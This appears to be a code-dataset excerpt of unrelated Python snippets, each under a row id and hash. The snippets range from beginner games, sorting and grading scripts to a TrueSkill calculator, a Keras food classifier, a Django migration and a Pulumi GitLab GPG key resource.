if __name__ == '__main__':
ch = ''
while ch != 3:
os.system('clear')
print "\t\t\t\t\t\t\t***** MAIN MENU *****\n\n\n"
print "\n\t1. LOGIN \t\t\t\t\t2. REGISTER NEW USER\t\t\t\t\t\t3. EXIT\n"
try:
ch = str(raw_input('\n\n\t\t\t\t\tENTER YOUR RESPONSE :- '))
if ch == '1':
login()
elif ch == '2':
registration()
continue
elif ch == '3':
print("\tThank You !! Visit Again")
break
else:
print("WRONG CHOICE")
os.system('clear')
continue
except NameError:
print("\n\tSelect Your Option between 1 to 3")
ch = str(raw_input("\t\tEnter your choice : "))
except SyntaxError:
print("Select Your Option (1-3)")
ch = str(raw_input("\tEnter your choice : "))
|
2,931 | 337311c3fbb6a8baab7a237d08152f0db9822527 |
def assert_shapes(shape, other):
assert len(shape) == len(other), "Dimensions are different"
for s, o in zip(shape, other):
if s is not None and o is not None:
assert s == o, "Shapes {} and {} are not equal".format(shape, other)
|
2,932 | bcc24d5f97e46433acb8bcfb08fe582f51eb28ce | class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
def getString(self):
return "회사명\n"+self.name+"\n\n주소\n"+self.addr
def getTeleString(self):
return "회사명 : " + self.name + ", 주소 : " + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary, url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url=url
self.start = start
self.end = end
def getString(self):
return "공고명 : " + self.name + "\n채용형태 : " + self.type + "\n경력 : " + self.experience + "\n학력 : " + self.education + "\n업무 : " + self.keyword + "\n연봉 : " + self.salary
def getTeleString(self):
return "공고명 : " + self.name |
2,933 | 5d654c056e6ef01e72821427c4f8dcb285755ee9 | from .data_processing import make_request_data, clear_request_data, get_token_from_text
from .review import Review |
2,934 | ec604aea28dfb2909ac9e4b0f15e6b5bbe1c3446 | from email.mime.text import MIMEText
import smtplib
def init_mail(server, user, pwd, port=25):
server = smtplib.SMTP(server, port)
server.starttls()
server.login(user, pwd)
return server
def send_email(mconn, mailto, mailfrom, mailsub, msgbody):
msg = MIMEText(msgbody)
msg['Subject'] = mailsub
msg['To'] = mailto
msg['From'] = mailfrom
mconn.sendmail(mailfrom, mailto, msg.as_string())
mconn.quit()
|
2,935 | 009be282e45d191eb8f4d7d2986a2f182d64c1dd | from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, \
getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, "gameInfo")
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose
betaSquared = gameInfo.beta**2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix
aTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = (start * middleInverse * end) * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = (e**expPart) * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)
|
2,936 | 0a5570ef17efa26ef6317930df616c8326f83314 | # Generated by Django 3.0.1 on 2020-02-01 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shopUser', '0024_order_contact'),
]
operations = [
migrations.AddField(
model_name='order',
name='location',
field=models.CharField(default='dhaka,Mohammadpur', max_length=200),
preserve_default=False,
),
]
|
2,937 | cf4582f4d0c6c94e617270a45425fe0b770142e0 | # coding: utf-8
"""
最简单的计数器,仅仅为了展示基本方式
"""
import tensorflow as tf
# 创建一个变量, 初始化为标量 0
state = tf.Variable(0, name="counter")
# 创建一个operation, 其作用是使state 增加 1
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value
# 启动图后, 变量必须先经过`初始化` (init) op 初始化,
# 首先必须增加一个`初始化` op 到图中.
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op) # 运行 init_op
print(sess.run(state)) # 打印出事状态
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
|
2,938 | 1cc9c89182f69a5f1eb9a0e7f3433dc30c8d7035 |
print("calificacion de los alumnos")
lista2_calificaciones=[]
for i in range (0,5):
lista2_calificaciones.append(int(input(f"ingrese la calificacion corresponfiente al alumno")))
print(lista2_calificaciones)
for n in range(0,len(lista2_calificaciones)):
if lista2_calificaciones[i] >=0 and lista2_calificaciones[i]<=5:
print("valor insuficiente, repetir el curso")
else:
if lista2_calificaciones[i] >5 and lista2_calificaciones[i]<=7:
print("Valor es aprobatorio")
else:
if lista2_calificaciones[i]>7 and lista2_calificaciones[i]<9:
print("valor es notable")
else:
if lista2_calificaciones[i] ==9 and lista2_calificaciones[i]==10:
print("el valor es notable")
else:
print("Valor muy alto vuelvalo a intentar")
|
2,939 | fef1273552350bfaf075d90279c9f10a965cae25 | # Accepted
def bubble_sort(a_list, n):
num_reverse = 0
for i in range(n):
for j in range(n - i - 1):
# With a for roop (reversed order),
# index starts -1, -2 ,...,
# NOT -0, -1, ...
if a_list[-j - 2] > a_list[-j - 1]:
tmp_elem = a_list[-j - 1]
a_list[-j - 1] = a_list[-j - 2]
a_list[-j - 2] = tmp_elem
num_reverse += 1
return a_list, num_reverse
def main():
# Input
n = int(input())
a_list = list(map(int, input().split()))
# Sort
a_list_reversed, num_reverse = bubble_sort(a_list, n)
# Output
print(" ".join(map(str, a_list_reversed)))
print(num_reverse)
if __name__ == '__main__':
main() |
2,940 | d4b01b015723950a4d8c3453d736cd64f306d27b | # Game Tebak Angka
from random import randint
nyawa = 3
angka_rahasia = randint(0,10)
limit = 0
print(f"Selamat datang di Game Tebak angka")
while nyawa > limit:
print(f"Percobaan anda tersisa {nyawa}")
jawaban = int(input("Masukkan angka 0-10 = "))
if jawaban == angka_rahasia:
print ("Anda Benar")
break
elif nyawa-1 == limit:
print ("Anda Gagal")
break
elif jawaban > angka_rahasia:
print("Lebih")
nyawa -= 1
elif jawaban < angka_rahasia:
print("Kurang")
nyawa -= 1
"""# Game Tebak Angka
from random import randint
# Mengimpor Library Random untuk membuat angka rahasia secara acak
nyawa = 3 # Jumlah percobaan yang di berikan
angka_rahasia = randint(0,10) # Angka rahasia sebagai jawaban game
limit = 0 # Batas nyawa jika nyawa jadi 0 maka pemain akan gagal
print(f"Selamat datang di Game Tebak angka")
while nyawa > limit:
# ini menandakan bahwa game akan berjalan
# jika nyawa lebih besar dari limit
print(f"Percobaan anda tersisa {nyawa}")
# ini untuk memberitahukan pemain jumlah nyawa yang mereka miliki
jawaban = int(input("Masukkan angka 0-10 = "))
# ini untuk menerima angka tebakan dari pemain
if jawaban == angka_rahasia:
print ("Anda Benar")
break
# ini untuk memeriksa apakah angka yang
# di masukan pemain sama dengan angka rahasia
elif nyawa-1 == limit:
print ("Anda Gagal")
break
# Jika jawabannya salah maka nyawanya akan di periksa di sini jika
# nyawanya sudah mencapai limit maka game nya akan selesai
# dan pemain akan kalah
elif jawaban > angka_rahasia:
print("Lebih")
nyawa -= 1
elif jawaban < angka_rahasia:
print("Kurang")
nyawa -= 1
# ini untuk memberikan bantuan kepada pemain apakah angka yang di masukkan
# itu lebih besar atau kurang dari angka rahasia
"""
|
2,941 | 1255a9df2fbe11d92991f3f0f7054b92cb017628 | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 20:29:49 2019
@author: kzx789
"""
from PIL import Image
import os, glob, numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import math
import cv2
import pymysql
import MySQLdb as mysql
"""
#csv를 읽어서 영양정보 출력
def get_Nutrition(str) :
nutrition = pd.read_csv('C:/식품영양정보/영양정보.csv')
print(nutrition[nutrition['음식명'] == str])
"""
#사용된 전체 이미지 출력
def drawing_plt():
thisImg = os.listdir(caltech_dir)
row = 4
cols = int(math.ceil(len(thisImg)/4)) #반올림
fig = plt.figure()
i = 1
for image in glob.glob("C:/cnnTest/*.jpg"): #glob를 사용해서 Test로 사용된 파일 가져오기
img = cv2.imread(image)
subplot = fig.add_subplot(row, cols, i)
subplot.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)) #기본컬러
subplot.set_title(thisImg[i-1]) #타이틀 붙이기
subplot.axis("off")
i += 1
print('\t',"전체 이미지 리스트 ")
plt.show()
#조건에 맞는 개별 이미지 출력
def get_Image(str):
imgPath = 'C:/cnnTest/'
image = cv2.imread(imgPath+str)
image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
plt.imshow(image)
plt.xticks([])
plt.yticks([])
plt.show()
#데이터베이스에서 영양소 정보 가지고 오기
def get_DB_Nutrition(str):
db = pymysql.connect(host="localhost", user = "yeha", password="", db="nutrition")
cur = db.cursor() #Connection에서 Cursor생성
sql = "SELECT * FROM NUTRITION_INFO WHERE FOODNAME LIKE '음식명' OR FOODNAME LIKE %s"
cur.execute(sql,(str))
data = cur.fetchall() #정보 전부 가져오기
df = pd.Series(data[0],data[1])
print(df)
db.close()
caltech_dir = "C:/cnnTest"
#테스트할 데이터들을 128*128로 지정
image_w = 128
image_h = 128
pixels = image_h * image_w * 3 #픽셀 지정
X = []
#filenames = []
files = os.listdir(caltech_dir) #하위 디렉터리 파일 리스트 구하기
#print(files) #이미지 목록 확인
for i in range(len(files)):
files[i]=caltech_dir+'/'+ files[i]
#print(files)
for f in files:
img = Image.open(f)
img = img.convert("RGB")
img = img.resize((image_w, image_h))
data = np.asarray(img)
# filenames.append(f)
X.append(data)
X = np.array(X)
#print(X)
#모델 불러오기
from keras.models import load_model
model = load_model("C:/image/train/model/multi_img_classification.model")
prediction = model.predict(X)
#print(prediction)
np.set_printoptions(formatter={'float': lambda x: "{0:0.3f}".format(x)})
print('프로그램을 실행합니다..')
print('\n')
thisImg = os.listdir(caltech_dir)
cnt = 0
for i in prediction:
pre_ans = i.argmax() # 예측 레이블//가장 큰 번째 수
#print(i)
#print(pre_ans)
pre_ans_str = ''
if pre_ans == 0: pre_ans_str = "연어회"
elif pre_ans == 1: pre_ans_str = "쌀국수"
elif pre_ans == 2: pre_ans_str = "샌드위치"
else: pre_ans_str = "새우튀김"
if i[0] >= 0.8 :
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[1] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[2] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[3] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
cnt += 1
drawing_plt()
|
2,942 | 051544f41cc3c7d78210076cb9720866924ea2a1 | # Print list of files and directories
import os
def file_list(dir):
subdir_list = []
for item in os.listdir(dir):
fullpath = os.path.join(dir,item)
if os.path.isdir(fullpath):
subdir_list.append(fullpath)
else:
print(fullpath)
for d in subdir_list:
file_list(d)
file_list('D:\Workspace\test\PythonProject')
|
2,943 | 95021cc01c0b85b512fd466797d4d128472773c3 | import shelve
arguments = ["self", "info", "args", "world"]
minlevel = 2
helpstring = "moneyreset"
def main(connection, info, args, world) :
"""Resets a users money"""
money = shelve.open("money-%s.db" % (world.hostnicks[connection.host]), writeback=True)
money[info["sender"]] = {"money":100000, "maxmoney":100000, "items":[], "coinchance":[True for x in range(50)] + [False for x in range(50)]}
money.sync()
connection.ircsend(info["channel"], "%s: Your money data has been reset." % (info["sender"]))
|
2,944 | 5a0702dd869862ebc27c83d10e0b1f0575de68a7 | import itertools
import numpy
import math
import psycopg2
import podatki
baza = podatki.baza
dom = podatki.preberi_lokacijo()
seznam_trgovin =["spar", "mercator", "tus", "hofer", "lidl"]
id_in_opis = podatki.id_izdelka_v_opis()
seznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]
'''
def zemljevid_trgovin(trgovine):
sez = []
for trgovina in trgovine:
sez.append([trgovina, [])
def kombinacije_trgovin(seznam_izdelkov):
sez_kombinacij = []
for trgovina in trgovine:
kombinacija = []
izdelki = sez_izdelkov
for izdelek in izdelki:
if izdelek in trgovina:
izdelki = izdelki.remove(izdelek)
'''
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))
kombinacije = []
for mnozica_trgovin in generator_kombinacij:
izdelki_kombinacije = set()
for trgovina in mnozica_trgovin:
for izdelek in trgovine_z_izdelki[trgovina]:
izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah
if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
kombinacije.append(mnozica_trgovin)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
return kombinacije
return None
def razdalja(vozlisce1, vozlisce2):
return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)
#dom = [x,y]
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
skupine = [] #skupine vozlišč iste trgovine
poti = []
for trgovina in kombinacija:
skupine.append(podatki.lokacije(slovar_koordinat, trgovina))
for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin
dolzina = razdalja(dom, i)
if len(kombinacija) > 1:
for j in skupine[1]:
dolzina += razdalja(i, j)
if len(kombinacija) > 2:
for k in skupine[2]:
dolzina += razdalja(j, k)
if len(kombinacija) > 3:
for m in skupine[3]:
dolzina += razdalja(k, m)
if len(kombinacija) > 4:
for n in skupine[4]:
dolzina += razdalja(m, n)
dolzina += razdalja(n, dom)
poti.append([[dom, i, j, k, m, n], dolzina])
dolzina = 0
else:
dolzina += razdalja(m, dom)
poti.append([[dom, i, j, k, m], dolzina])
dolzina = 0
else:
dolzina += razdalja(k, dom)
poti.append([[dom, i, j, k], dolzina])
dolzina = 0
else:
dolzina += razdalja(j, dom)
poti.append([[dom, i, j], dolzina])
dolzina = 0
else:
dolzina *= 2
poti.append([[dom, i], dolzina])
dolzina = 0
dolzine = [el[1] for el in poti]
if dolzine == []:
print("Nakupa ni mogoče opraviti.")
return None
mini = numpy.argmin(dolzine)
return poti[mini] #[[pot], dolzina]
return (dolzina, sez_vozlisc)
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
vozlisca = []
dolzine = []
trgovine = []
for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):
par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
dolzine.append(par[1])
vozlisca.append(par[0])
trgovine.append(kombinacija)
if dolzine == []:
return None
i = numpy.argmin(dolzine)
v = vozlisca[i]
v.append(dom)
obiskane_trgovine = trgovine[i]
return v, obiskane_trgovine
def razporeditev(obiskane_trgovine, izdelki, slovar):
izdelki2 = izdelki.copy()
razporeditev = []
for trgovina in obiskane_trgovine:
sez = []
for izdelek in izdelki:
if {izdelek}.issubset(slovar[trgovina]):
izd = podatki.id_izdelka_v_opis()[izdelek-1]
sez.append(izd)
izdelki2.remove(izdelek)
razporeditev.append([trgovina, sez])
return razporeditev
baza.commit()
slovar_koordinat = podatki.slovar_koordinat
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
#print(kombinacije_trgovin)'
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
|
2,945 | 6c88e55a76cbd84cee0ebd6c51d930cc2da100d2 | print("hello world")
print("lol")
print("new changes in vis") |
2,946 | bdbeebab70a6d69e7553807d48e3539b78b48add | # SymBeam examples suit
# ==========================================================================================
# António Carneiro <amcc@fe.up.pt> 2020
# Features: 1. Numeric length
# 2. Pin
# 3. Two rollers
# 4. Numeric distributed constant load
# 5. Numeric distributed quadratic load
import matplotlib.pyplot as plt
from symbeam import beam
test_beam = beam(6, x0=0)
test_beam.add_support(0, "roller")
test_beam.add_support(2, "roller")
test_beam.add_support(6, "pin")
test_beam.add_support(4, "hinge")
test_beam.add_distributed_load(0, 4, -5)
test_beam.add_distributed_load(4, 6, "-(-3*(x-5)**2 + 8)")
test_beam.solve()
fig, ax = test_beam.plot()
plt.savefig(__file__.split(".py")[0] + ".svg")
|
2,947 | ba808d23f6a8226f40e1c214012a1535ee1e9e98 | import os
import json
import librosa
# Constants
# Dataset used for training
DATASET_PATH = "dataset"
# Where the data is stored
JSON_PATH = "data.json"
# Number of samples considered to preprocess data
SAMPLES_TO_CONSIDER = 22050 # 1 sec worth of sound
# Main function to preprocess the data
def prepare_dataset(dataset_path, json_path, n_mfcc=13, hop_length=512, n_fft=2048):
# create data dictionary
data = {
"mappings": [], # keywords
"labels": [], # a value for each audio file in the dataset
"MFCCs": [], # MFCC for each audio file
"files": [] # filenames with path for each audio file
}
# loop through all the sub-dirs
# walk through a folder structure recursively top-down
for i, (dir_path, dir_names, filenames) in enumerate(os.walk(dataset_path)):
# we need to ensure that we are not at root level
if dir_path is not dataset_path:
# update mappings
category = dir_path.split("\\")[-1] # category name ex: dataset\\wahad -> [dataset, wahad]
data["mappings"].append(category)
print(f"Processing {category}")
# loop through filenames and extract MFCCs
for f in filenames:
# get file path
file_path = os.path.join(dir_path, f) # gives us the whole file path
# load audio file
signal, sr = librosa.load(file_path)
# ensure the audio file is at least 1 second
if len(signal) >= SAMPLES_TO_CONSIDER:
# enforce on 1 sec. long signal
signal = signal[:SAMPLES_TO_CONSIDER]
# extract the MFCCs
MFCCs = librosa.feature.mfcc(signal, n_mfcc=n_mfcc,
hop_length=hop_length, n_fft=n_fft)
# store data
data["labels"].append(i - 1)
data["MFCCs"].append(MFCCs.T.tolist())
data["files"].append(file_path)
print(f"{file_path}: {i - 1}")
# store in json file
with open(json_path, "w") as fp:
json.dump(data, fp, indent=4)
if __name__ == "__main__":
prepare_dataset(DATASET_PATH, JSON_PATH)
|
2,948 | 1593280a29b13461b13d8b2805d9ac53ce94c759 |
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape("human.gif")
def game_loop():
score = 0
lives = 3
wn.register_shape("human.gif")
wn.register_shape("Evil-Virus.gif")
wn.register_shape("surgical-mask.gif")
# Add the player
player = turtle.Turtle()
player.speed(0)
player.shape("human.gif")
player.color("white")
player.penup()
player.goto(0, -250)
player.direction = "stop"
# Create a list of good guys
good_guys = []
# Add the good_guys
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape("surgical-mask.gif")
good_guy.color("blue")
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
# Create a list of bad guys
bad_guys = []
# Add the bad_guys
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape("Evil-Virus.gif")
bad_guy.color("red")
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
# Make the pen
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape("square")
pen.color("white")
pen.penup()
pen.goto(0, 260)
font = ("Courier", 24, "normal")
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
# Make the message
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color("yellow")
message.penup()
message.goto(0, 0)
font = ("Calibri", 24, "bold")
message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)
# Functions
def go_left():
player.direction = "left"
def go_right():
player.direction = "right"
def stop_player():
player.direction = "stop"
# Keyboard Binding
wn.listen()
wn.onkeypress(go_left, "Left")
wn.onkeyrelease(stop_player, "Left")
wn.onkeypress(go_right, "Right")
wn.onkeyrelease(stop_player, "Right")
while True:
# Update screen
wn.update()
# Move the player
if player.direction == "left":
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == "right":
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
# Move the good guys
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
# Check for a collision with player
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
# Move the bad guys
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
# Check for a collision with player
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
# wn.listen()
# if wn.onkeypress(toggle_new_game, "a"):
# if new_game == True:
break
# wn.onkeypress(sys.exit(), "q")
while True:
# Update screen
wn.update()
# Play music
wn.bgpic("retro_city.gif")
winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
#sys.exit()
wn.mainloop() |
2,949 | 1f1677687ba6ca47b18728b0fd3b9926436e9796 | #Voir paragraphe "3.6 Normalizing Text", page 107 de NLP with Python
from nltk.stem.snowball import SnowballStemmer
from nltk.stem.wordnet import WordNetLemmatizer
# Il faut retirer les stopwords avant de stemmer
stemmer = SnowballStemmer("english", ignore_stopwords=True)
lemmatizer = WordNetLemmatizer()
source = ["having", "have", "needs", "need", "inflation", "inflate", "developments", "developing", "aggregation",
"aggregated", "population", "poverty", "poor", "poorer", "men", "man", "gases", "gas", "sues", "utilized",
"damaged"]
stems1 = [stemmer.stem(word) for word in source]
stems2 = [lemmatizer.lemmatize(word) for word in source]
stems3 = [stemmer.stem(word) for word in stems2]
print(stems1)
print(stems2)
print(stems3)
|
2,950 | aa79d5cbe656979bf9c228f6a576f2bbf7e405ca | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['UserGpgKeyArgs', 'UserGpgKey']
@pulumi.input_type
class UserGpgKeyArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a UserGpgKey resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
pulumi.set(__self__, "key", key)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if key is not None:
pulumi.set(__self__, "key", key)
if key_id is not None:
pulumi.set(__self__, "key_id", key_id)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyId")
def key_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_id", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
